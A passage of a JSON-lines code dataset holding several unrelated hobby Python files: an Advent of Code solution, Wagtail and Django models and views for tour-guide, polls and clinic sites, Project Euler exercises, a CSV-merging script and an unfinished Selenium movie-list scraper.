inspected items 52166 and 52013 times. Multiplying these together, the level of monkey business in this situation is now 2713310158.\n\nWorry levels are no longer divided by three after each item is inspected; you'll need to find another way to keep your worry levels manageable. Starting again from the initial state in your puzzle input, what is the level of monkey business after 10000 rounds?\n'''\n\nimport re\ntry:\n    from tqdm import tqdm\nexcept ImportError:\n    from pip._internal import main as pip\n    pip(['install', '--user', 'tqdm'])\n    from tqdm import tqdm\n\n\nclass badMonkey():\n\n\tdef __init__(self,number:int, bag:list,operation:tuple, test:int, target:tuple):\n\t\tprint(f\"Creating monkey {number}...\")\n\t\tself.number = number\n\t\tself.bag = bag\n\t\tself.itemsInspected = 0\n\t\tself.operation = operation\n\t\tself.test = test\n\t\tself.target = target\n\t\t# shared modulus (product of every monkey's divisibility test), set once all monkeys are parsed\n\t\tself.modulus = None\n\n\tdef getInfo(self):\n\t\tprint(f\"Monkey {self.number} info:\")\n\t\tprint(f\"Bag: {self.bag}\")\n\t\tprint(f\"Items Inspected: {self.itemsInspected}\")\n\t\treturn ''\n\n\tdef inspectBag(self, verbose:bool = False):\n\t\t'''\n\t\tReturns a list of dicts with the Target monkey and the item's concern level\n\t\t'''\n\t\tif verbose:\n\t\t\tprint(f\"Monkey {self.number} is Inspecting Items in Bag...\")\n\t\treturnBag = []\n\t\twhile self.bag:\n\t\t\tself.itemsInspected += 1\n\t\t\titem = self.bag.pop(0)\n\n\t\t\t# part two: worry is no longer divided by three; reduce modulo the shared\n\t\t\t# product of all tests instead, which keeps numbers small without changing\n\t\t\t# any divisibility outcome\n\t\t\titem = self.newOperation(item) % self.modulus\n\t\t\t# print(self.operation)\n\t\t\treturnBag.append({\"Target\": self.findTarget(item),\n\t\t\t\"Concern\": item})\n\t\treturn returnBag\n\n\tdef findTarget(self,concern:int):\n\t\t# if divisible by the test, return the first target, otherwise the second\n\t\tif not concern % self.test:\n\t\t\treturn self.target[0]\n\t\treturn self.target[1]\n\n\tdef newOperation(self, concern:int):\n\t\tif self.operation[0] == '+':\n\t\t\tconcern += self.operation[1]\n\t\tif self.operation[0] == '-':\n\t\t\tconcern -= self.operation[1]\n\t\tif self.operation[0] == '*':\n\t\t\tconcern *= self.operation[1]\n\t\tif self.operation[0] == '/':\n\t\t\tconcern /= self.operation[1]\n\t\tif self.operation[0] == '**':\n\t\t\tconcern *= concern\n\t\treturn concern\n\t\n\tdef catchItem(self, concern:int):\n\t\tself.bag.append(concern)\n\n\ndef getNumbers(text:str):\n\n\treturn re.findall('[0-9]+', text)\n\ndef processMonkey(monkey:list):\n\tmonkeyNumber = int(getNumbers(monkey[0])[0])\n\t\n\t#create monkey bag\n\tbag = []\n\tconcern = getNumbers(monkey[1])\n\tfor num in concern:\n\t\tbag.append(int(num))\n\n\n\tif getNumbers(monkey[2]):\n\t\toperation = re.search('[-+\\\\*]+', monkey[2])[0]\n\t\toperationMod = int(getNumbers(monkey[2])[0])\n\telse:\n\t\toperation = '**'\n\t\toperationMod = 0\n\n\ttest = int(getNumbers(monkey[3])[0])\n\ttarget = (int(getNumbers(monkey[4])[0]),int(getNumbers(monkey[5])[0]))\n\n\t# print(monkeyNumber, bag, operation, operationMod, test, TF)\n\treturn badMonkey(monkeyNumber, bag, (operation, operationMod), test, target)\n\n\n\nwith open(\"./input.txt\", \"r\") as f:\n    inputFile = [monkey.split('\\n') for monkey in f.read().split('\\n\\n')]\n\nmonkeys = []\n\nfor item in inputFile:\n\tmonkeys.append(processMonkey(item))\n\n# compute the shared modulus once every monkey's test is known\nmodulus = 1\nfor monkey in monkeys:\n\tmodulus *= monkey.test\nfor monkey in monkeys:\n\tmonkey.modulus = modulus\n\n\nfor monkey in monkeys:\n\tprint(monkey.getInfo())\n\n# print(monkeys[0].inspectBag())\n\nfor count in tqdm(range(10000)):\n\tfor monkey in monkeys:\n\t\titems = monkey.inspectBag()\n\t\tfor item in items:\n\t\t\tmonkeys[item['Target']].catchItem(item['Concern'])\n\ncount = []\nfor monkey in monkeys:\n\tcount.append(monkey.itemsInspected)\ncount = 
sorted(count)\nprint(count[-1]*count[-2])","repo_name":"pangjeffa/advantcode2022","sub_path":"day11/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":6033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20925861075","text":"\"\"\"Our team page\"\"\"\n\nfrom django.db import models\nfrom django import forms\n\n# django contact form\n#from django.shortcuts import render\n#from django.views.generic import View\n#from django.http import HttpResponse # Add this\n#from .forms import ContactForm\n\nfrom wagtail.core.models import Page, Orderable\nfrom wagtail.admin.edit_handlers import FieldPanel\n\nfrom wagtail.core.fields import RichTextField\nfrom wagtail.search import index\n\nfrom modelcluster.fields import ParentalKey, ParentalManyToManyField\nfrom wagtail.core.fields import StreamField\nfrom wagtail.admin.edit_handlers import (\n StreamFieldPanel, \n FieldPanel, \n InlinePanel, \n FieldRowPanel,\n MultiFieldPanel\n)\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom wagtail.snippets.edit_handlers import SnippetChooserPanel\nfrom wagtail.snippets.models import register_snippet\nfrom streams import blocks\nfrom django.utils.text import slugify\n\nfrom wagtail.core.fields import RichTextField\nfrom wagtail.contrib.forms.models import (\n AbstractEmailForm,\n AbstractFormField\n)\nfrom django.shortcuts import redirect\nfrom django.forms import widgets\n\nclass GuideQualification(models.Model):\n \"\"\"Guide qualification for a snippet\"\"\"\n\n qualification = models.CharField(max_length=127)\n slug = models.SlugField(\n verbose_name=\"slug\",\n allow_unicode=True,\n max_length=127,\n help_text='A slug to identify guides by this qualification',\n )\n\n panels = [\n FieldPanel(\"qualification\"),\n FieldPanel(\"slug\"),\n ]\n\n class Meta:\n verbose_name = \"Guide Qualification\"\n verbose_name_plural = \"Guide Qualifications\"\n ordering = [\"qualification\"]\n\n def __str__(self):\n return self.qualification\n\nregister_snippet(GuideQualification)\n\nclass GuideToursOrderable(Orderable):\n page = ParentalKey(\"ourteam.TourGuidePage\", related_name=\"guide_tours\")\n # Note: tours pages for each guide\n tours_pages = models.ForeignKey(\n \"tours.TourPage\",\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name=\"+\"\n )\n\n def __str__(self):\n return self.page.title\n\nclass FormField(AbstractFormField):\n page = ParentalKey(\n 'OurteamPage',\n on_delete=models.CASCADE,\n related_name='form_fields',\n )\n\nclass OurteamPage(AbstractEmailForm):\n \"\"\"our Team page\"\"\"\n\n template = \"ourteam/ourteam_page.html\"\n\n subtitle = models.CharField(max_length=100, null=True, blank=True)\n\n thank_you_text = RichTextField(blank=True)\n\n content = StreamField(\n [\n (\"title_and_text\", blocks.TitleAndTextBlock()),\n (\"full_richtext\", blocks.RichtextBlock()),\n (\"cards\", blocks.CardBlock()),\n ],\n null=True,\n blank=True\n\n )\n\n #def get_context(self, request):\n # #if request.POST:\n # context = super().get_context(request)\n # guide = request.GET.get('guide')\n # if guide is not None:\n\n _guide = None\n @property\n def guide_page(self):\n return self._guide\n\n @guide_page.setter\n def guide_page(self, current_guide):\n self._guide = current_guide\n\n @property\n def return_form(self):\n form = self.get_form()\n return form\n \n def get_form(self, *args, **kwargs):\n form = super().get_form(*args, **kwargs)\n # iterate through the fields in the generated form\n for name, field in 
form.fields.items(): \n            # for all fields, get any existing CSS classes and add 'form-control'\n            # ensure the 'class' attribute is a string of classes with spaces\n            css_classes = field.widget.attrs.get('class', '').split()\n            css_classes.append('form-control')\n            field.widget.attrs.update({'class': ' '.join(css_classes)})\n        return form\n\n    #def render_landing_page(self, request, form_submission=None, *args, **kwargs):\n    #    page = request.POST.get(\"guide\")\n    #    url = self.url\n    #    return redirect(page, permanent=False) \n\n    search_fields = Page.search_fields + [\n        index.SearchField('subtitle'),\n        # index.SearchField('body'),\n    ]\n\n    content_panels = AbstractEmailForm.content_panels + [\n        InlinePanel('form_fields', label='Form Fields'),\n        FieldPanel('thank_you_text'),\n        MultiFieldPanel([\n            FieldRowPanel([\n                FieldPanel('from_address', classname=\"col6\"),\n                FieldPanel('to_address', classname=\"col6\"),\n            ]),\n            FieldPanel(\"subject\"),\n        ], heading=\"Email Settings\"),\n        FieldPanel(\"subtitle\"),\n        StreamFieldPanel(\"content\")\n    ]\n\n    class Meta:\n        verbose_name = \"Our Team Page\"\n        verbose_name_plural = \"Our Team Pages\"\n\nclass TourGuidePage(Page):\n    template = \"ourteam/tourguide_page.html\"\n\n    first_name = models.CharField(max_length=100)\n    last_name = models.CharField(max_length=100)\n    intro = models.CharField(max_length=254, null=True, blank=True)\n    body = RichTextField(blank=True)\n    qualifications = ParentalManyToManyField(\"ourteam.GuideQualification\", blank=True)\n    include_contact_form = models.BooleanField()\n    contact_email = models.CharField(max_length=100)\n    image = models.ForeignKey(\n        \"wagtailimages.Image\",\n        on_delete=models.SET_NULL,\n        null=True,\n        blank=False,\n        related_name=\"+\",\n    )\n\n    allow_direct_guide_booking = models.BooleanField(help_text=\"whether this guide agrees to be booked for an hourly rate plus additional charge\")\n    hourly_rate_low_season = models.DecimalField(max_digits=4, decimal_places=2, help_text=\"hourly rate low season\")\n    hourly_rate_high_season = models.DecimalField(max_digits=4, decimal_places=2, help_text=\"hourly rate high season\")\n    additional_charge_per_day = models.DecimalField(max_digits=4, decimal_places=2, help_text=\"added charge per group for each day\", default=20.00)\n    #form = ContactForm()\n\n    main_province = models.ForeignKey(\n        'tours.TourProvince',\n        null=True,\n        blank=True,\n        on_delete=models.SET_NULL,\n        related_name='+'\n    )\n\n    def get_context(self, request):\n        context = super().get_context(request)\n        parent = self.get_parent()\n        parent.specific.guide_page = self\n        form = parent.specific.return_form\n        context['ourteamsform'] = form\n        return context\n    #    context['parent'] = parent\n    #    return context\n    @property\n    def return_form(self):\n        # return_form on the parent page is a property, so it must not be called\n        return self.get_parent().specific.return_form\n\n    def clean(self):\n        \"\"\"Override the values of title and slug before saving.\"\"\"\n        super(TourGuidePage, self).clean()\n        self.title = \"%s %s\" % (self.first_name, self.last_name)\n        self.slug = slugify(self.title) \n\n    #def contact_us(self, request):\n    #  if request.method == 'POST':\n    #      form = ContactForm(request.POST)\n    #      if form.is_valid():\n    #          # send email code goes here\n    #          return HttpResponse('Thanks for contacting us!')\n    #      else:\n    #          form = ContactForm()\n\n    #      return render(request, 'contact-landing.html', {'form': form})\n\n    search_fields = Page.search_fields + [\n        index.SearchField('intro'),\n        index.SearchField('body'),\n        index.SearchField('qualifications'),\n        index.SearchField('guide_tours'),\n    ]\n\n    #content_panels = 
Page.content_panels + [\n    content_panels = [\n        MultiFieldPanel([\n            FieldPanel('first_name'),\n            FieldPanel('last_name'),\n            FieldPanel('contact_email'),\n            FieldPanel('include_contact_form'),\n            ImageChooserPanel(\"image\"),\n            SnippetChooserPanel(\"main_province\"),\n        ], heading=\"Guide general information\"),\n        MultiFieldPanel(\n            [\n                FieldPanel(\"qualifications\", widget=forms.CheckboxSelectMultiple)\n            ],\n            heading=\"Guide Qualifications\"\n        ),\n        MultiFieldPanel([\n            InlinePanel(\"guide_tours\", label=\"Tours\", min_num=0, max_num=10), \n            FieldPanel('allow_direct_guide_booking'),\n            FieldPanel('hourly_rate_low_season'),\n            FieldPanel('hourly_rate_high_season'),\n            FieldPanel('additional_charge_per_day'),\n        ], heading=\"Tours Specification\"),\n        FieldPanel('intro'),\n        FieldPanel('body'),\n    ]\n\nTourGuidePage._meta.get_field('slug').default = 'blank-slug'","repo_name":"wolfpirker/wagtail-webproject","sub_path":"ourteam/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"30200128344","text":"import os\n\n# Problem 16 ___________________________________\n\ndef digitsum(n):\n    N=2**n\n    c=str(N)\n    S=0\n    for k in c:\n        d=int(k)\n        S+=d\n    return S\n\nassert (digitsum(15))==26\n\nprint (digitsum(1000)) \n#=1366\n\n\n\n# Problem 22 ______________________________________\n\ndef valeurlettre(lettre):\n    L=['\"','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n    k=0\n    while lettre!=L[k]:\n        k+=1\n    return k\n\nassert (valeurlettre('K'))==11\n\n\ndef nscore():\n    os.chdir(\"/Users/alixrenier/Documents/Mines/Info\")\n    Names=open('names.txt','r') # 'r' opens the file for reading, 'w' would open it for writing\n    Stot=0\n    for k in Names:\n        ch=k\n        L=ch.split(',')\n        #print(L)\n        T=sorted(L) # list of names sorted alphabetically\n        #print (T)\n        for i in range(len(T)): \n            position=i+1\n            nom=str(T[i])\n            Si=0\n            for j in range(len(nom)):\n                valeur=valeurlettre(nom[j])\n                Si+=valeur\n            Ai=Si*position\n            Stot+=Ai\n    return Stot\n    \nprint(nscore())\n#=87119882\n\n\n# Problem 55 _________________________________________\n\ndef revadd(n): # reverses n and returns its sum with n\n    N=str(n)\n    L=str()\n    for k in range(len(N)):\n        L=L+N[len(N)-(k+1)]\n    l=int(L)\n    S=n+l\n    return S\n\nassert (revadd(47))==121\n\n\ndef palindrome(S): # determines whether S is a palindrome\n    C=str(S)\n    k=0\n    for i in range(int(len(C)/2)):\n        if C[i]==C[len(C)-(i+1)]:\n            k+=1\n    return k==int(len(C)/2)\n\nassert (palindrome(121))==True\n\n\ndef estunlychrel (n) :\n    S = revadd(n)\n    k = 0\n    while k<50 and not palindrome(S) :\n        S = revadd(S)\n        k+=1\n    if k < 50:\n        return False\n    else :\n        return True\n\ndef solve(n) :\n    N = 0\n    for i in range(n) :\n        if estunlychrel(i) :\n            N+=1\n    return N\n\n#print (solve(10000))\n#=249\n","repo_name":"mines-nancy-tcss1a-2018/td1-AlixRenier","sub_path":"TD1.py","file_name":"TD1.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"5080155145","text":"import pandas as pd\nimport glob\nimport os\n\ninput_file = 'C:/data/csv/predict1/'\n\noutput_file = 'C:/data/csv/predict1/result4.csv'\n\nallFile_list = glob.glob(os.path.join(input_file, 
'0121predict3_*'))\n\nprint(allFile_list)\nallData = []\n\nfor file in allFile_list:\n    df = pd.read_csv(file) # read each csv file in the for loop\n    df = df.iloc[:,-1]\n    allData.append(df) # append the loaded data to the (initially empty) list\n\ndataCombine = pd.concat(allData, axis=1, ignore_index=True)\n\ndataCombine.to_csv(output_file, index=False,header=0)","repo_name":"jsja22/study","sub_path":".vscode/solar_system/solar_0120_csv.py","file_name":"solar_0120_csv.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"73146105766","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom django.forms import modelformset_factory\nfrom .models import Question, Choice\nfrom .forms import QuestionForm, ChoiceForm\n\ndef index(request):\n\n    if request.method == \"POST\":\n        question = get_object_or_404(Question, pk=request.POST[\"question\"])\n        question.delete()\n        return HttpResponseRedirect(reverse(\"main:index\"))\n\n    latest_question_list = Question.objects.filter(pub_date__lte=timezone.now()).exclude(choice__isnull=True).order_by(\"pub_date\")\n    context = { \"latest_question_list\": latest_question_list }\n    return render(request, \"main/index.html\", context)\n\n@login_required\ndef detail(request, question_id):\n    question = get_object_or_404(Question, pk=question_id)\n    return render(request, \"main/detail.html\", {\"question\": question})\n\ndef results(request, question_id):\n    question = get_object_or_404(Question, pk=question_id)\n    return render(request, \"main/results.html\", {\"question\": question})\n\ndef vote(request, question_id):\n    question = get_object_or_404(Question, pk=question_id)\n    try:\n        selected_choice = question.choice_set.get(pk=request.POST[\"choice\"])\n    except (KeyError, Choice.DoesNotExist):\n        # Redisplay the question voting form.\n        return render(\n            request,\n            \"main/detail.html\",\n            {\n                \"question\": question,\n                \"error_message\": \"You didn't select a choice.\",\n            },\n        )\n    else:\n        selected_choice.votes += 1\n        selected_choice.save()\n        # Always return an HttpResponseRedirect after successfully dealing\n        # with POST data. 
This prevents data from being posted twice if a\n # user hits the Back button.\n return HttpResponseRedirect(reverse(\"main:results\", args=(question.id,)))\n \ndef sign_up(request):\n if request.method == \"POST\":\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n return HttpResponseRedirect(reverse(\"main:index\"))\n else:\n form = UserCreationForm()\n \n return render(request, \"registration/sign_up.html\", {\"form\": form})\n\n@login_required\ndef create_question(request):\n if request.method == \"POST\":\n form_q = QuestionForm(request.POST)\n ChoiceFormSet = modelformset_factory(Choice, fields=['choice_text'], form=ChoiceForm, extra=4)\n choice_formset = ChoiceFormSet(request.POST, queryset=Choice.objects.none())\n\n if form_q.is_valid() and choice_formset.is_valid():\n question = form_q.save(commit=False)\n question.pub_date = timezone.now()\n question.save()\n \n for choice_form in choice_formset:\n choice = choice_form.save(commit=False)\n if choice.choice_text == \"\":\n continue\n choice.question = question\n choice.votes = 0\n choice.save()\n \n return HttpResponseRedirect(reverse(\"main:index\"))\n else:\n form_q = QuestionForm()\n ChoiceFormSet = modelformset_factory(Choice, fields=['choice_text'], form=ChoiceForm, extra=4)\n choice_formset = ChoiceFormSet(queryset=Choice.objects.none())\n return render(request, \"main/create_question.html\", {\"form_q\": form_q, \"choice_formset\": choice_formset})","repo_name":"VolodymyrHarasymchuk/django-project","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22449006234","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n    path('data-master/airports', views.airports, name=\"airports\"),\n    path('data-master/carriers', views.carriers, name=\"carriers\"),\n    path('dataset-raw', views.dataset_raw, name=\"dataset-raw\"),\n    path('dataset-clean', views.dataset_clean, name=\"dataset-clean\"),\n    path('json_statistik', views.json_statistik, name=\"json_statistik\"),\n    path('statistik', views.statistik, name=\"statistik\"),\n    path('classifier', views.classifier, name=\"classifier\"),\n    path('prediction', views.prediction, name=\"prediction\"),\n    path('json_dataset_clean', views.json_dataset_clean, name=\"json_dataset_clean\"),\n    path('json_predict', views.json_predict, name=\"json_predict\"),\n    path('json_split_data', views.json_split_data, name=\"json_split_data\"),\n]\n","repo_name":"KurangKering/sdfsfslvjx","sub_path":"app/system/flightdelay/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"17250930935","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserChangeForm, UserCreationForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\nfrom .models import (\n    Medico,\n    Especialidade,\n    Paciente,\n    Consulta\n)\nfrom .forms import (\n    MedicoForm,\n    EspecialidadeForm,\n    PacienteForm,\n    ConsultaForm,\n\tEditarPerfilForm,\n\tCadastraUsuarioForm\n)\n# Create your views here.\n@login_required()\ndef listaConsultas(request):\n    consultas = Consulta.objects.all()\n    form = ConsultaForm()\n    data = {'consultas':consultas , 'form':form}\n    return render(request, 'sistema/consultas/lista-consultas.html', data)\n\n@login_required()\ndef cadastraConsulta(request):\n    form = ConsultaForm(request.POST or None)\n    data = {'form':form}\n    if form.is_valid():\n        form.save()\n        return redirect('lista_consultas')\n    return render(request,'sistema/consultas/cadastraconsulta.html',data)\n\n\n@login_required()\ndef editaConsulta(request, id):\n\tdata = {}\n\tconsulta = Consulta.objects.get(id=id) # get the record that will be edited\n\tform = ConsultaForm(request.POST or None, instance = consulta) # initialize a form with the fields pre-filled\n\tdata['consulta'] = consulta\n\tdata['form'] = form\n\n\tif request.method == 'POST':\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('lista_consultas')\n\telse:\n\t\treturn render(request, 'sistema/consultas/editaconsulta.html', data)\n\n\n@login_required()\ndef deleteConsulta(request, id):\n\tconsulta = Consulta.objects.get(id=id)\n\tif request.method == 'POST':\n\t\tconsulta.delete()\n\t\treturn redirect('lista_consultas')\n\telse:\n\t\treturn render(request, 'sistema/deleteconfirm.html', \n        {'obj': consulta, 'url': \"/consultas/\"})\n\n\n#medicos\n@login_required()\ndef listaMedicos(request):\n    medicos = Medico.objects.all()\n    form = MedicoForm()\n    data = {'medicos':medicos , 'form':form}\n    return render(request, 'sistema/medicos/lista-medicos.html', data)\n\n\n@login_required()\ndef cadastraMedico(request):\n    form = MedicoForm(request.POST or None)\n    data = {'form':form}\n    if form.is_valid():\n        form.save()\n        return redirect('lista_medicos')\n    return render(request,'sistema/medicos/cadastramedico.html',data)\n\n\n@login_required()\ndef editaMedico(request, id):\n\tdata = {}\n\tmedico = Medico.objects.get(id=id) # get the record that will be edited\n\tform = MedicoForm(request.POST or None, 
instance = medico) # initialize a form with the fields pre-filled\n\tdata['medico'] = medico\n\tdata['form'] = form\n\n\tif request.method == 'POST':\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('lista_medicos')\n\telse:\n\t\treturn render(request, 'sistema/medicos/editamedico.html', data)\n\n\n@login_required()\ndef deleteMedico(request, id):\n\tmedico = Medico.objects.get(id=id)\n\tif request.method == 'POST':\n\t\tmedico.delete()\n\t\treturn redirect('lista_medicos')\n\telse:\n\t\treturn render(request, 'sistema/deleteconfirm.html', \n        {'obj': medico, 'url': \"/medicos/\"})\n\n\n@login_required()\ndef listaEspecialidades(request):\n    especialidades = Especialidade.objects.all()\n    form = EspecialidadeForm()\n    data = {'especialidades':especialidades , 'form':form}\n    return render(request, \n    'sistema/especialidade/lista-especialidades.html', data)\n\n\n@login_required()\ndef cadastraEspecialidade(request):\n\tform = EspecialidadeForm(request.POST or None)\n\tdata = {'form':form}\n\tif form.is_valid():\n\t\tform.save()\n\t\treturn redirect('lista_especialidades')\n\n\n@login_required()\ndef editaEspecialidade(request, id):\n\tif not request.user.has_perm('usuario.view_user'):\n\t\treturn redirect('sem_permissao')\n\tdata = {}\n\tespecialidade = Especialidade.objects.get(id=id) # get the record that will be edited\n\tform = EspecialidadeForm(request.POST or None, instance = especialidade) # initialize a form with the fields pre-filled\n\tdata['especialidade'] = especialidade\n\tdata['form'] = form\n\n\tif request.method == 'POST':\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('lista_especialidades')\n\telse:\n\t\treturn render(request, 'sistema/especialidade/editaespecialidade.html', data)\n\n\n@login_required()\ndef deleteEspecialidade(request, id):\n\tespecialidade = Especialidade.objects.get(id=id)\n\tif request.method == 'POST':\n\t\tespecialidade.delete()\n\t\treturn redirect('lista_especialidades')\n\telse:\n\t\treturn render(request, 'sistema/deleteconfirm.html', \n        {'obj': especialidade, 'url': \"/especialidades/\"})\n\n\n@login_required()\ndef listaPacientes(request):\n    pacientes = Paciente.objects.all()\n    form = PacienteForm()\n    data = {'pacientes':pacientes , 'form':form}\n    return render(request, \n    'sistema/pacientes/lista-pacientes.html', data)\n\n\n@login_required()\ndef cadastraPaciente(request):\n    form = PacienteForm(request.POST or None)\n    data = {'form':form}\n    if form.is_valid():\n        form.save()\n        return redirect('lista_pacientes')\n    return render(request,'sistema/pacientes/cadastrapaciente.html',data)\n\n\n\n@login_required()\ndef editaPaciente(request, id):\n\tdata = {}\n\tpaciente = Paciente.objects.get(id=id) # get the record that will be edited\n\tform = PacienteForm(request.POST or None, instance = paciente) # initialize a form with the fields pre-filled\n\tdata['paciente'] = paciente\n\tdata['form'] = form\n\n\tif request.method == 'POST':\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('lista_pacientes')\n\telse:\n\t\treturn render(request, 'sistema/pacientes/editapaciente.html', data)\n\n\n@login_required()\ndef deletePaciente(request, id):\n\tpaciente = Paciente.objects.get(id=id)\n\tif request.method == 'POST':\n\t\tpaciente.delete()\n\t\treturn redirect('lista_pacientes')\n\telse:\n\t\treturn render(request, 'sistema/deleteconfirm.html', \n        {'obj': paciente, 'url': \"/pacientes/\"})\n\n\n# MY PROFILE\n@login_required()\ndef listaPerfil(request):\n\targs = {'user': request.user}\n\treturn render(request, 
'sistema/perfil/perfil.html', args)\n\n\n\n@login_required()\ndef editaPerfil(request):\n\tif request.method == 'POST':\n\t\tform = EditarPerfilForm(request.POST, instance=request.user)\n\t\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('lista_perfil')\n\t\n\telse:\n\t\tform = EditarPerfilForm(instance=request.user)\n\t\targs = {'form': form}\n\t\treturn render(request, 'sistema/perfil/editaperfil.html', args)\n\n\n# register a user\n@login_required()\ndef cadastraUsuario(request):\n\tif not request.user.has_perm('usuario.view_user'):\n\t\treturn redirect('sem_permissao')\n\tif request.method == 'POST':\n\t\tform = CadastraUsuarioForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('cadastra_usuario_sucesso')\n\telse:\n\t\tform = CadastraUsuarioForm()\n\t\targs = {'form':form}\n\t\treturn render(request, 'sistema/usuarios/cadastrausuario.html', args)\n\n\n@login_required()\ndef cadastraUsuarioSucesso(request):\n\treturn render(request, 'sistema/usuarios/cadastro-usuario-sucesso.html')\n\n\n@login_required()\ndef semPermissao(request):\n\treturn render(request, 'sistema/sem-permissao.html')\n","repo_name":"renanosoriorosa/pyHospital","sub_path":"clinica/sistema/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6988,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"22026504077","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport time\n\ndriver = webdriver.Chrome(executable_path=\"chromedriver.exe\")\n\ndriver.implicitly_wait(10)\n\ndriver.get('https://pedia.watcha.com/ko-KR/decks/OphYTWVoSDLG')\n\nresponse = requests.get('https://pedia.watcha.com/ko-KR/decks/OphYTWVoSDLG')\nsoup = BeautifulSoup(response.text, 'html.parser')\nmovies_list = soup.select('ul.css-xv4sal-VisualUl-ContentGrid-DeckContentGrid.e12idbfv16 > li')\nprint(movies_list)\n\nfinal_movie_data = []\n\nfor movie in movies_list:\n    a_tag = movie.select_one('a')\n\n    movie_title = a_tag['title']\n    movie_code = a_tag['href'].split('contents/')[1]\n\n    movie_data = {\n        'title': movie_title,\n        'code': movie_code,\n    }\n    final_movie_data.append(movie_data)\n\n    print(final_movie_data)\n\nSCROLL_PAUSE_TIME = 10\n\n# Get scroll height\nlast_height = driver.execute_script(\"return document.body.scrollHeight\")\n\nwhile True:\n    # scroll down to the very bottom of the page\n    driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\n    # wait for the page to load\n    time.sleep(SCROLL_PAUSE_TIME)\n    driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight-50);\")\n    time.sleep(SCROLL_PAUSE_TIME)\n\n    # Calculate new scroll height and compare with last scroll height\n    new_height = driver.execute_script(\"return document.body.scrollHeight\")\n\n    # stop scrolling if the new height is unchanged from the previous height\n    if new_height == last_height:\n        break\n\n    # if the page did scroll, store the post-scroll window height as the new baseline\n    last_height = new_height\n\n\n\n\n\n\n# with open('./brand_infos.csv', mode='w') as brand_infos:\n#     brand_writer = csv.writer(brand_infos)\n\n#     for list in brand_list:\n#         brand_writer.writerow([list[\"name\"], list[\"img\"], list[\"link\"]])\n\n\n# for movie in final_movie_data:\n#     movie_code = movie['code']\n\n#     # the movie review endpoint does not check headers, so there is no need to send them\n#     params = (\n#         ('code', movie_code),\n#         ('type', 'after'),\n#         ('isActualPointWriteExecute', 'false'),\n#         ('isMileageSubscriptionAlready', 'false'),\n#         ('isMileageSubscriptionReject', 'false'),\n#     )\n\n#     response = requests.get(\n#         
'https://movie.naver.com/movie/bi/mi/pointWriteFormList.nhn', params=params)\n\n#     soup = BeautifulSoup(response.text, 'html.parser')\n\n#     review_list = soup.select('body > div > div > div.score_result > ul > li')\n\n#     count = 0\n\n#     for review in review_list:\n#         score = review.select_one('div.star_score > em').text\n#         reple = ''\n\n#         # handle the common case first (processing the common case first is more efficient)\n#         if review.select_one(f'div.score_reple > p > span#_filtered_ment_{count} > span#_unfold_ment{count}') is None:\n#             reple = review.select_one(\n#                 f'div.score_reple > p > span#_filtered_ment_{count}').text.strip()\n#         # handle the case where the review is long\n#         elif review.select_one(f'div.score_reple > p > span#_filtered_ment_{count} > span#_unfold_ment{count}'):\n#             reple = review.select_one(\n#                 f'div.score_reple > p > span#_filtered_ment_{count} > span > a')['data-src']\n\n#         print(score, reple)\n\n#         count += 1\n","repo_name":"5ohyun/Scraping","sub_path":"incomplete_selenium.py","file_name":"incomplete_selenium.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
